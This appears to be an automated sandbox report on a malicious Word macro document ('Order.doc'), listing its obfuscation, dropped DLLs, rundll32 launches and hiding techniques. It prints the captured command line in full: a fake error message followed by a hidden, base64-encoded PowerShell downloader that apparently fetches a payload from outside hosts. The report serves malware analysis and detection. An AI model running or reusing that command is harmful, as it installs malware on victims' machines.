Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Order.doc Stream path 'Macros/VBA/Jlzk8qsqcshl6jk' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jlzk8qsqcshl6jk Name: Jlzk8qsqcshl6jk
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF0027197C push eax; iretd 5_2_000007FF002719E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0040100B push ss; iretd 7_2_0040100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024F090 push edx; ret 7_2_0024F237
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023057F push ss; iretd 7_2_00230580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00452D98 push 00452E25h; ret 7_2_00452E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460020 push 00460058h; ret 7_2_00460050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00454038 push 00454064h; ret 7_2_0045405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B2 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B4 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042B274 push 0042B2CDh; ret 7_2_0042B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043C34C push 0043C378h; ret 7_2_0043C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx 7_2_0042E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004604F4 push 0046055Ch; ret 7_2_00460554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460498 push 004604EFh; ret 7_2_004604E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605F0 push 0046063Ch; ret 7_2_00460634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460580 push 004605ACh; ret 7_2_004605A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045B588 push 0045B5CAh; ret 7_2_0045B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605B8 push 004605E4h; ret 7_2_004605DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460654 push 00460680h; ret 7_2_00460678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004606C4 push 004606F0h; ret 7_2_004606E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D6DC push 0042D751h; ret 7_2_0042D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx 7_2_0042E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046068C push 004606B8h; ret 7_2_004606B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx 7_2_0042E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428748 push 00428774h; ret 7_2_0042876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx 7_2_0042E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D754 push 0042D7ADh; ret 7_2_0042D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004607E4 push 00460827h; ret 7_2_0046081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428798 push 004287C4h; ret 7_2_004287BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004637A8 push 004637E0h; ret 7_2_004637D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00463848 push 00463874h; ret 7_2_0046386C

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jonxwll\xztbsp.lei:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
